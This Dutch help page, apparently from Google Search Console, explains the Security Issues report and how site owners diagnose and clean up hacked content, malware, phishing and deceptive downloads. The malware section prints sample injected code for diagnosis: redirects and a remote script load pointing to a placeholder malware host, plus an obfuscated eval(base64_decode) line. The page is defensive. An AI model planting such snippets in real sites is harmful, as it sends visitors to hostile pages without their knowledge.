Als uit een evaluatie van Google blijkt dat je site is gehackt of gedrag op je site potentieel schadelijk is voor bezoekers of hun computers, kun je de bevindingen van Google bekijken in het rapport Beveiligingsproblemen. Voorbeelden van schadelijk gedrag zijn phishingaanvallen of het installeren van malware of ongewenste software op de computer van de gebruiker.
Pagina's of sites met een beveiligingsprobleem kunnen met een waarschuwingslabel worden getoond in zoekresultaten. Ook kan een interstitial waarschuwingspagina worden getoond in de browser als een gebruiker de betreffende pagina's of sites probeert te bezoeken.
Het rapport Beveiligingsproblemen openen
Security issues report in Search Console - Google Search Console Training
Wat zijn beveiligingsproblemen?
De beveiligingsproblemen die hier worden gerapporteerd, vallen in de volgende categorieën:
- Gehackte content: Dit is content die als gevolg van kwetsbaarheden in de sitebeveiliging op je site wordt geplaatst zonder dat je hiervoor toestemming hebt gegeven. Omdat we onze gebruikers willen beschermen, probeert Google gehackte content zo veel mogelijk uit de zoekresultaten te weren. Meer informatie
- Malware en ongewenste software: Dit is software die is ontworpen om een apparaat of de gebruikers daarvan te schaden, die misleidend of onverwacht gedrag vertoont of die negatieve gevolgen heeft voor de gebruiker. Malware kan worden geïnstalleerd door een hacker of door de site-eigenaar. Meer informatie
- Social engineering: Dit is content die bezoekers ertoe probeert te verleiden iets gevaarlijks te doen, zoals vertrouwelijke informatie verstrekken of software downloaden. Meer informatie
Heb ik beveiligingsproblemen op mijn site?
Als je site beveiligingsproblemen heeft, zie je bovenaan het rapport het aantal beveiligingsproblemen op je site.
Als er geen sprake is van beveiligingsproblemen, zie je een groen vinkje en een melding.
Maar ik heb deze site net gekocht
Als je onlangs een site hebt gekocht met reeds bestaande beveiligingsproblemen, verhelp je de problemen die worden vermeld in het rapport Beveiligingsproblemen. Laat ons daarna via een verzoek tot heroverweging weten dat je de site onlangs hebt gekocht en dat deze nu voldoet aan de spambeleid voor Google Zoeken.
Ik kan het probleem niet reproduceren
Google Safe Browsing toont waarschuwingen aan gebruikers op basis van de browsecontext. Daarom kun je de waarschuwingen wel of niet reproduceren. Vertrouw gewoon op het rapport Beveiligingsproblemen als bron van waarheid om na te gaan of er beveiligingsproblemen zijn voor je site of dat deze zijn opgelost.
Op welke pagina's is het beveiligingsprobleem van toepassing?
Vouw een probleembeschrijving uit om een lijst te bekijken met voorbeelden van URL's waarop het beveiligingsprobleem van toepassing is. Deze lijst is niet noodzakelijkerwijs volledig, maar bevat voorbeelden van pagina's op je site waarop het geselecteerde probleem van toepassing is. Je kunt af en toe een beveiligingsprobleem zonder voorbeeld-URL's hebben. Dit betekent niet dat er geen pagina's met het probleem zijn, maar alleen dat we geen voorbeelden kunnen genereren.
De probleemgegevens bevatten de datum waarop het probleem voor het eerst op je site is gevonden, een korte beschrijving en een link voor meer informatie over het probleem.
Het probleem verhelpen
Zo verhelp je een beveiligingsprobleem op je site:
- Vouw de probleembeschrijving in het rapport 'Beveiligingsproblemen' uit.
- Lees de beschrijving en klik op de link Meer informatie voor gedetailleerde informatie en stappen om het probleem te verhelpen. (De links voor 'Meer informatie' verwijzen naar de beschrijvingen hieronder op deze pagina.)
- Gebruik het voorbeeld van de betreffende pagina's in het gedeelte met details om het probleem te identificeren en te verhelpen. Deze lijst is niet noodzakelijkerwijs volledig, maar bevat voorbeelden van pagina's op je site waarop dit probleem van toepassing is. Je kunt een beveiligingsprobleem zonder voorbeeld-URL's hebben. Dit betekent niet dat er geen pagina's met het probleem zijn, maar alleen dat we geen voorbeelden kunnen genereren.
- Verhelp het probleem op je hele site. Als je het probleem op slechts enkele pagina's verhelpt, wordt je site niet gedeeltelijk weergegeven in de zoekresultaten.
- Als in het rapport meerdere beveiligingsproblemen voor je site worden vermeld, verhelp je ze allemaal.
- Test je oplossingen.
- Als alle problemen in het rapport zijn verholpen op alle pagina's, selecteer je Beoordeling aanvragen in het rapport Beveiligingsproblemen. Vermeld je oplossingen in het verzoek tot heroverweging. Een goed verzoek heeft de volgende kenmerken:
- Het beschrijft het exacte kwaliteitsprobleem op je site.
- Het beschrijft de stappen die je hebt genomen om het probleem te verhelpen.
- Het documenteert het resultaat van je inspanningen.
- Beoordelingen voor heroverweging kunnen enige tijd in beslag nemen (zie hieronder). Je wordt via e-mail op de hoogte gehouden van de voortgang. Nadat je je verzoek hebt verzonden, ontvang je een bevestigingsbericht om je te laten weten dat het beoordelingsproces is gestart. Stuur geen nieuw verzoek voordat je een definitief besluit voor het openstaande verzoek hebt ontvangen.
Hoeveel tijd neemt de beoordeling voor heroverweging in beslag?
De meeste beoordelingen voor heroverweging kunnen een paar dagen of weken in beslag nemen, maar in sommige gevallen kan dit langer duren, bijvoorbeeld bij aan links gerelateerde verzoeken tot heroverweging. Nadat we je verzoek hebben ontvangen, krijg je van ons een e-mail zodat je weet dat het beoordelingsproces actief is. Je ontvangt ook een e-mail als de beoordeling is afgerond.
Dien je verzoek niet opnieuw in voordat je een besluit voor openstaande verzoeken hebt ontvangen. Als je een verzoek tot heroverweging indient wanneer het probleem niet is verholpen, kan dit leiden tot een langere omlooptijd voor het volgende verzoek of zelfs tot gevolg hebben dat je wordt aangeduid als recidivist.
Lijst met beveiligingsproblemen
Hier volgt een lijst met mogelijke beveiligingsproblemen en informatie over hoe je elk probleem kunt verhelpen. Problemen worden geclassificeerd als fouten of waarschuwingen .
Uitleg van beveiligingsproblemen - Google Search Console-training
1. Bevestig het probleem
Ga in de Chrome-browser naar een paar van de voorbeeld-URL's. Je ziet waarschijnlijk een waarschuwing Dangerous in de navigatiebalk van de browser en een interstitial waarschuwingspagina die er ongeveer zo uitziet:
2. Bepaal of je dit kunt verhelpen
Als je een malwareprobleem op je site wilt verhelpen, moet je de code voor je site kunnen lezen en begrijpen en mogelijk ook weten hoe webserverconfiguraties werken. Als je dit te moeilijk vindt, lees je het artikel Een supportteam samenstellen voor meer informatie over hoe je iemand kunt vinden die je kan helpen dit probleem op te lossen.
3. Voer een diagnose uit en verhelp het malwareprobleem
Lees het gedeelte over het oplossen van problemen met malware in de handleiding voor gehackte sites op web.dev voor meer informatie over hoe je het malwaretype kunt identificeren en het probleem kunt oplossen. Houd er rekening mee dat je site kan zijn geïnfecteerd met meerdere typen malware. Ga grondig te werk bij het vaststellen van de malware en het opschonen van je site. Ga na of het probleem zich voordoet op een van de voorbeeld-URL's in het rapport Beveiligingsproblemen.
4. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
5. Volg de best practices om je site veilig te houden
Lees deze richtlijnen voor meer informatie over hoe je kunt voorkomen dat je site wordt gehackt en hoe je de beveiliging van je site in de gaten kunt houden.
Een hacker heeft je site gehackt en voegt schadelijke code in op je pagina's. Voorbeelden hiervan zijn omleidingen naar een schadelijke site of het uitvoeren van software voor cryptocurrency-mining in je browser terwijl de pagina is geopend.
1. Bepaal of je dit kunt verhelpen
Bekijk het artikel Een supportteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.
2. Bevestig het probleem
Ga na of het probleem zich voordoet bij een van de voorbeeld-URL's voor deze waarschuwing.
Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.
Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.
Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:
- Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
- Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar
www.example.com/page.html
, gebruik je een cURL zoals deze:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
De hacker kan de schadelijke code rechtstreeks hebben ingevoegd in de HTML-bestanden van je site (bijvoorbeeld door een JavaScript-omleiding toe te voegen) of in bestanden die de content van je site genereren (bijvoorbeeld PHP-bestanden).
Haal een gehackte pagina op die wordt vermeld in het rapport en controleer de reactie. Hackers kunnen verschillende technieken gebruiken om bezoekers van je site om te leiden naar hun site. Hier volgen er een paar:
- Omleiding:
- Headeromleidingen: Hackers kunnen bezoekers omleiden door de configuratiebestanden van je server aan te passen. In de configuratiebestanden van de server kan de beheerder de URL's specificeren waarnaar pagina's of directory's op een website omleiden. Op Apache-servers zijn dit bijvoorbeeld het .htaccess-bestand en httpd.conf.
... < HTTP/1.1 301 Moved Permanently < Date: Sun, 24 Feb 2013 21:06:45 GMT < Server: Apache < Location: http://<malware-site>/index.html < Content-Length: 253
- JavaScript-omleidingen:
<script> if (document.referrer.match(/google\.com/)) { window.location("http://<malware-site>/");} <script>
- Headeromleidingen: Hackers kunnen bezoekers omleiden door de configuratiebestanden van je server aan te passen. In de configuratiebestanden van de server kan de beheerder de URL's specificeren waarnaar pagina's of directory's op een website omleiden. Op Apache-servers zijn dit bijvoorbeeld het .htaccess-bestand en httpd.conf.
- Schadelijke JavaScript-code geladen via een andere site:
<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
- Schadelijke code die is verborgen om detectie te voorkomen:
eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));
Zoek naar verdachte code in je reacties en op je site. Handige zoektermen zijn 'search', 'eval', 'base64_decode' en 'unescape'.
3. Schoon je site op
Als je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen.
Aanvullende punten:
- Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
4. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Een hacker heeft links of tekst met spam aan de pagina's van je site toegevoegd. De ingevoegde content kan farmaceutische termen of andere spam bevatten die niets met de content van de site te maken heeft.
Hackers proberen je site meestal op een van de volgende manieren te wijzigen:
- Door het verkrijgen van toegang tot een onveilige directory op je server. Je kunt bijvoorbeeld per ongeluk open toegangsrechten hebben verleend aan een directory.
- Door misbruik te maken van een zwakke plek in de software op je site, zoals een contentmanagementsysteem. Je gebruikt bijvoorbeeld een verouderde, onveilige versie van Drupal, Joomla! of WordPress.
- Door het hacken van plug-ins van derden die je gebruikt op je site, zoals bezoekerstellers.
1. Bepaal of je dit kunt verhelpen
Bekijk het artikel Een supportteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.
2. Bevestig het probleem
Ga na of het probleem zich voordoet bij een van de voorbeeld-URL's voor deze waarschuwing.
Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.
Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.
Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:
- Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
- Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar
www.example.com/page.html
, gebruik je een cURL zoals deze:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
Haal enkele pagina's van je site op en zoek in de reacties naar verdachte content of links die je niet hebt toegevoegd. Zoek bijvoorbeeld naar farmaceutische termen of spamtermen, zoals 'viagra' of 'verdien geld'.
3. Schoon je site op
Als je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content en links met spam verwijderen van elke pagina. Zorg ervoor dat je alle hackingacties corrigeert die worden weergegeven in het rapport Beveiligingsproblemen. Zoek daarnaast naar andere pagina's op je site die mogelijk zijn gehackt. Gebruik hiervoor een zoekopdracht met 'site:' op Google en zoek in de bronbestanden van je website.
Aanvullende punten:
- Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
4. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Een hacker heeft nieuwe pagina's op je site gemaakt, die vaak woorden of links met spam bevatten. Soms bevatten deze nieuwe pagina's code die ongewenst gedrag veroorzaakt, zoals je gebruikers omleiden naar andere sites of je webserver laten deelnemen aan een denial-of-service-aanval tegen andere sites.
1. Bepaal of je dit kunt verhelpen
Bekijk het artikel Een supportteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.
2. Bevestig het probleem
Ga na of het probleem zich voordoet bij een van de voorbeeld-URL's voor deze waarschuwing.
Gebruik geen browser om geïnfecteerde pagina's op je site rechtstreeks te bekijken.
Omdat malware zich vaak verspreidt door misbruik te maken van kwetsbaarheden van de browser, kun je je computer beschadigen door een geïnfecteerde malwarepagina in een browser te openen. Ook kunnen hackers de content met spam verbergen via cloaking-technieken om detectie door site-eigenaren te voorkomen.
Hier zijn twee alternatieve methoden om content veiliger te bekijken op je computer:
- Gebruik de URL-inspectietool om je pagina te bekijken zoals Google deze ziet. Dit is handig omdat veel hackers wijzigingen aanbrengen die alleen zichtbaar zijn voor Google-computers. Ze kunnen bijvoorbeeld links vanaf jouw site naar hun site toevoegen die alleen worden weergegeven wanneer Google de verwijzer is.
- Gebruik cURL of Wget om HTTP-verzoeken (bijvoorbeeld om een pagina op te halen) uit te voeren via de opdrachtregel. Deze gratis beschikbare tools zijn nuttig bij de diagnose van omleidingen en kunnen tevens informatie verstrekken over de verwijzer of user-agent. Hackers vallen vaak alleen specifieke user-agents of verwijzers aan om detectie te voorkomen en betere doelen te selecteren. Als je deze tools gebruikt, kun je een doel nabootsen. Probeer verschillende verwijzende adressen (zoals links vanaf grote websites of verschillende zoekmachines) als je verzoek het spamgedrag niet oproept. Als je bijvoorbeeld een gebruiker wilt nabootsen die op een Windows-computer een link vanuit zoekresultaten van Google volgt naar
www.example.com/page.html
, gebruik je een cURL zoals deze:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
Vraag de voorbeeld-URL's in het rapport aan om te controleren of ze actief zijn. Je hebt deze pagina's waarschijnlijk niet zelf gemaakt, dus je moet de pagina's van je site verwijderen of de code verwijderen waarmee de pagina's automatisch worden gegenereerd. Bekijk meer informatie over hoe je deze pagina's op je site kunt vinden en opschonen.
Je kunt ook een zoekopdracht met 'site:' uitvoeren om pagina's te vinden die je niet hebt gemaakt.
- Op een kleine site kun je naar [site:example.com] zoeken op Google Zoeken om een lijst met pagina's weer te geven die we hebben geïndexeerd. In deze lijst kun je zien of er pagina's zijn die je niet hebt gemaakt.
- Voor grotere sites kun je een specifiekere zoekopdracht uitvoeren, zoals:
- [site:example.com apotheek]: Hiermee worden alle pagina's op example.com weergegeven die het woord 'apotheek' bevatten.
- [site:example.com/wp-admin/]: Hiermee worden alle pagina's in het sitebeheergedeelte van je WordPress-site weergegeven.
3. Schoon je site op
Als je klaar bent om je site op te schonen, kun je de betreffende directory's vervangen door de laatste goede back-up of kun je de ongewenste pagina's verwijderen, evenals de bestanden of functies die de hacker heeft gebruikt om ze te maken.
Aanvullende punten:
- Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt.
4. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Je site bevat content die bezoekers ertoe probeert te verleiden iets gevaarlijks te doen, zoals vertrouwelijke gegevens verstrekken of software downloaden. Google Safe Browsing beschermt internetgebruikers door ze te waarschuwen voordat ze pagina's bezoeken die constant misleidende content weergeven.
In de volgende gevallen worden webpagina's als misleidend beschouwd:
- Als ze zich voordoen als of eruitzien als een vertrouwde entiteit, zoals je eigen apparaat of browser of de website zelf.
- Als ze je proberen te verleiden om iets te doen wat je normaal gesproken alleen doet voor een vertrouwde entiteit, zoals een wachtwoord delen, technische support bellen of software downloaden.
Dit type misleidende content wordt social engineering genoemd. Ontdek meer over social engineering of bekijk voorbeelden van misleidende pagina's.
Verhelp het probleem
1. Bevestig het probleem
Ga naar de voorbeeldpagina's om de misleidende content te zoeken. Met de URL-inspectietool kun je de mobiele en desktopweergave van je site bekijken.
2. Verhelp de problemen op je pagina's
Corrigeer alle pagina's die zich bezighouden met social engineering. Als je van mening bent dat Safe Browsing een webpagina ten onrechte heeft geclassificeerd, kun je dat hier melden.
3. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Je site bevat misleidende advertenties of ingesloten bronnen die bezoekers ertoe proberen te verleiden iets gevaarlijks te doen, zoals vertrouwelijke gegevens verstrekken of ongewenste software downloaden. Misleidende content kan worden opgenomen via bronnen die zijn ingesloten in de pagina, andere componenten van derden of advertenties. Google Safe Browsing beschermt internetgebruikers door ze te waarschuwen voordat ze pagina's bezoeken die constant misleidende content weergeven.
Soms is deze content zichtbaar voor gebruikers op de hostpagina. In andere gevallen bevat de hostpagina geen zichtbare advertenties, maar worden gebruikers via pop-ups, pop-unders of andere omleidingen naar schadelijke pagina's gebracht. In alle gevallen leidt dit type ingesloten content tot een beleidsschending voor de hostpagina.
Dit type misleidende content wordt social engineering genoemd. Ontdek meer over social engineering of bekijk voorbeelden van misleidende ingesloten bronnen.
Verhelp het probleem
1. Bevestig het probleem
Ga naar de voorbeeldpagina's om de misleidende content te zoeken. Zorg ervoor dat advertenties, afbeeldingen of andere ingesloten bronnen van derden op de pagina's van je site niet misleidend zijn. Houd er rekening mee dat advertentienetwerken de advertenties die op de pagina's van je site worden weergegeven, kunnen rouleren. Je moet een pagina daarom misschien een paar keer vernieuwen voordat social-engineeringadvertenties worden weergegeven. Bepaalde advertenties kunnen er verschillend uitzien op mobiele apparaten en desktopcomputers. Met de URL-inspectietool kun je de mobiele en desktopweergave van je site bekijken.
2. Verwijder de misleidende advertenties of bronnen
Controleer de bronnen van derden die zijn opgenomen op je site. Zorg ervoor dat advertenties, afbeeldingen of andere ingesloten bronnen van derden op de pagina's van je site niet misleidend zijn. Corrigeer alle pagina's die zich bezighouden met social engineering.
3. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Je site biedt gebruikers een download waarvan Google Safe Browsing denkt dat het malware of ongewenste software. De Chrome-browser kan een waarschuwing laten zien als een gebruiker je site bezoekt. Je moet deze downloads van je site verwijderen om de waarschuwing te verwijderen.
1. Bevestig het probleem
Bekijk een paar van de voorbeeldpagina's op je site om de aanwezigheid van deze downloads te bevestigen.
2. Beoordeel het probleem
- Als je deze downloads bewust hebt toegevoegd, verwijder je ze van je site en ga je door naar Een beoordeling aanvragen.
- Als je niets weet over downloads op je site, is je site mogelijk gehackt. Je moet je gehackte site corrigeren en de downloads zoeken en verwijderen.
3. Schoon je site op
Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt. Als je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen. Gebruik antivirussoftware om de binaire bestanden en andere content te scannen die op je site wordt gehost. Antivirussoftware vindt veel van de verschillende soorten malware en ongewenste software, maar helaas niet alle soorten. Als je je software indient bij een antivirusprogramma (of een antivirusconsolidatieservice, zoals VirusTotal), krijg je een indicatie van potentiële problemen met je software. Google Safe Browsing past eigen criteria toe om te bepalen of een programma of binair bestand ongewenste software of malware is.
4. Bevestig je oplossingen
Zorg ervoor dat je site voldoet aan het Beleid voor ongewenste software.
5. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Je site bevat links naar sites waarop downloads worden aangeboden die volgens Google Safe Browsing malware of ongewenste software zijn. De Chrome-browser kan een waarschuwing laten zien als een gebruiker je site bezoekt. Je moet links naar de schadelijke sites verwijderen om de waarschuwing te verwijderen.
1. Bevestig het probleem
Bekijk een paar van de voorbeeldpagina's op je site om de aanwezigheid van deze downloads te bevestigen. In sommige gevallen kunnen hackers deze links verbergen als ze denken dat je de eigenaar van de site bent. Probeer de voorbeeld-URL's te bezoeken met de URL-inspectietool of terwijl je bent ingelogd op een ander account of een andere computer.
2. Beoordeel het probleem
Als je deze links bewust hebt toegevoegd, verwijder je ze van je site en ga je door naar Een beoordeling aanvragen.
Als je niets weet over deze links, is je site mogelijk gehackt.
3. Bepaal of je dit kunt verhelpen
Als je site is gehackt, bekijk je het artikel Een supportteam samenstellen om een idee te krijgen van hoe je dit zelf kunt verhelpen of voor meer informatie over hoe je hulp kunt vinden als je dit niet zelf kunt doen.
4. Schoon je site op
Lees de gids voor gehackte sites voor een volledig oplossingsproces voor je site, waaronder stappen voor opschonen en tips om te voorkomen dat je site weer wordt gehackt. Als je klaar bent om je site op te schonen, kun je de betreffende bestanden vervangen door de laatste goede back-up of kun je de content met spam verwijderen.
5. Bevestig je oplossingen
Zorg ervoor dat je site voldoet aan het Beleid voor ongewenste software.
6. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Als Google heeft vastgesteld dat je site gebruikers onvoldoende informeert over mobiele kosten, kan Chrome een waarschuwing weergeven voordat de gebruiker een pagina laadt waarvoor kosten in rekening worden gebracht.
1. Bevestig het probleem
Ga naar de voorbeeld-URL's in het rapport om te bekijken welke pagina's gedrag met betrekking tot onduidelijke mobiele facturering vertonen. Bekijk de richtlijnen voor mobiele facturering.
2. Verhelp het probleem
Corrigeer je pagina's zodat ze voldoen aan de richtlijnen voor mobiele facturering.
3. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Sommige pagina's op je site bevatten mogelijk phishing. Er is een waarschuwingspop-up over een hergebruikt wachtwoord geactiveerd toen een gebruiker probeerde in te loggen. Google Safe Browsing beschermt internetgebruikers door ze in zulke gevallen te waarschuwen als ze hun opgeslagen wachtwoord opnieuw gebruiken.
Hackers kunnen gebruikers soms misleiden om hun wachtwoorden opnieuw te gebruiken op pagina's die lijken op die van officiële sitelog-ins om gebruikersgegevens te stelen. Dit type misleidende content wordt social engineering genoemd. Lees meer informatie over social engineering of bekijk voorbeelden van misleidende pagina's.
1. Bevestig het probleem
Ga naar de voorbeeldpagina's om de phishingcontent te zoeken. Met de URL-inspectietool kun je de mobiele en desktopweergave van je site bekijken.
2. Verhelp het probleem
Corrigeer alle pagina's die zich bezighouden met social engineering. Als je denkt dat je site is gehackt, bekijk je onze handleiding voor gehackte sites. Als je van mening bent dat Safe Browsing een webpagina ten onrechte heeft geclassificeerd, kun je dat hier melden.3. Vraag een beoordeling aan
Als je zeker weet dat het probleem op je site is verholpen, vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen.
Op je site wordt een download aangeboden die Google Safe Browsing niet eerder heeft gezien. De Chrome-browser kan een waarschuwing geven dat het bestand niet vaak wordt gedownload en mogelijk gevaarlijk is. Deze waarschuwingen worden automatisch ingetrokken als Google Safe Browsing kan verifiëren dat de bestanden veilig zijn. Houd er rekening mee dat er niet altijd voorbeeld-URL's worden weergegeven voor dit probleem.
Dit probleem voorkomt niet dat je pagina of site wordt weergegeven in de zoekresultaten van Google. Wel wordt een waarschuwing in de Chrome-browser getoond als een gebruiker in eerste instantie vraagt om onbekende bestanden te downloaden.
1. Verhelp het probleem
Zoek je downloads en controleer of deze voldoen aan de richtlijnen voor downloads.
- Als downloads op je site in strijd zijn met deze richtlijnen, verwijder je ze.
- Als een download niet in strijd is met deze richtlijnen, hoef je deze niet te verwijderen.
2. Vraag een beoordeling aan
Als je bestanden hebt verwijderd (of hebt geverifieerd dat je downloads voldoen aan de downloadrichtlijnen), vraag je een beveiligingsbeoordeling aan via het rapport Beveiligingsproblemen. Een beoordeling kan een paar dagen tot een paar weken in beslag nemen. Zelfs zonder een beoordelingsverzoek evalueert Google de meeste downloads op den duur en classificeert ze als acceptabel of schadelijk. Als je een beoordelingsverzoek indient, kun je het evaluatieproces versnellen.
Wat is het verschil tussen het rapport Handmatige acties en het rapport Beveiligingsproblemen?
In het rapport 'Handmatige acties' worden problemen met een pagina of site vermeld. Dit zijn meestal pogingen om onze zoekindex te manipuleren die niet noodzakelijkerwijs gevaarlijk zijn voor gebruikers. De meeste problemen die hier worden gemeld, leiden ertoe dat de pagina of site een lagere positie krijgt of wordt weggelaten uit zoekresultaten zonder enige visuele indicatie voor de gebruiker.
Het rapport Beveiligingsproblemen vermeldt aanwijzingen dat je site is gehackt of gedrag op je site dat potentieel schadelijk is voor een bezoeker of diens computer (bijvoorbeeld: phishingaanvallen of het installeren van malware of ongewenste software op de computer van de gebruiker). Deze pagina's kunnen met een waarschuwingslabel worden weergegeven in zoekresultaten. De browser kan ook een interstitial waarschuwingspagina weergeven als een gebruiker de betreffende pagina's probeert te bezoeken.